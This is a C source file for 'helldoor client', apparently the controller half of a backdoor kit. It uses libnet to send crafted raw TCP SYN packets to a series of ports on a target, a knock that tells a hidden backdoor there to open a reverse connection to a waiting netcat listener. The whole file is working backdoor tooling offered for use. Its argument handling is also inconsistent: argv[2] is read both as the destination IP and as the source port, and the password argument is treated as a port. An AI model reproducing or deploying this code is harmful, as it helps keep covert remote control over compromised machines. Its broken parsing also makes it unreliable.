/* helldoor client: sniffing, non binding, reverse connect, backdoor client
 * 
 *
 * You need libnet-1.1
 *
 * Compile:
 *   gcc -I /usr/local/include hdclient.c -o hdclient -lnet
 *
 * By Drizzt <drizzt@drizzt.it>
 */


#include <libnet.h>

void usage(char*);

inline void bad(libnet_t *l) {
    libnet_destroy(l);
	exit(EXIT_FAILURE);
}

int
main(int argc, char **argv)
{
	int c,i;
	libnet_t *l;
	libnet_ptag_t t;
	u_long dst_ip;
	u_short dst_prt;
	char errbuf[LIBNET_ERRBUF_SIZE];
 
	printf("helldoor client by Drizzt\n");
 
	/*
	 *  Initialize the library.  Root priviledges are required.
	 */
	l = libnet_init(
			LIBNET_RAW4,						/* injection type */
			NULL,								/* network interface */
			errbuf);							/* errbuf */
	if (l == NULL)
	{
		fprintf(stderr, "libnet_init() failed: %s", errbuf);
		exit(EXIT_FAILURE);
	}

	if (argc < 4)
	{
		usage(argv[0]);
		exit(EXIT_FAILURE);
	}

	dst_ip = libnet_name2addr4(l, argv[2], LIBNET_RESOLVE);

	for(i=3; i < argc; i++) {	
		dst_prt = (u_short)atoi(argv[i]);	
		t = libnet_build_tcp(
			atoi(argv[2]),						/* source port */
			dst_prt,							/* destination port */
			0x01010101,							/* sequence number */
			0x02020202,							/* acknowledgement num */
			TH_SYN,								/* control flags */
			32767,								/* window size */
			0,									/* checksum */
			10,									/* urgent pointer */
			LIBNET_TCP_H,						/* TCP packet size */
			0,									/* payload */
			0,									/* payload size */
			l,									/* libnet handle */
			0);									/* libnet id */
		if (t == -1)
		{
			fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l));
			bad(l);
		}

		t = libnet_build_ipv4(
			LIBNET_IPV4_H + LIBNET_TCP_H,			/* length */
			0,										/* TOS */
			242,									/* IP ID */
			0,										/* IP Frag */
			64,										/* TTL */
			IPPROTO_TCP,							/* protocol */
			0,										/* checksum */
			libnet_get_ipaddr4(l),					/* source IP */
			dst_ip,									/* destination IP */
			NULL,									/* payload */
			0,										/* payload size */
			l,										/* libnet handle */
			0);										/* libnet id */
		if (t == -1)
		{
			fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
			bad(l);
		} 

	/*
	 *  Write it to the wire.
	 */

		c = libnet_write(l);
		if (c == -1)
		{
			fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
			bad(l);
		}
		else
		{
			printf("Password send; check the netcat.\n");
		}
	}
	libnet_destroy(l);
	return (EXIT_SUCCESS);
}


void
usage(char *name)
{
	fprintf(stderr,
		"usage: %s source_port destination_ip password ports (port1 port2 ...)\n", name);
}

// vim: set ts=4 sw=4:
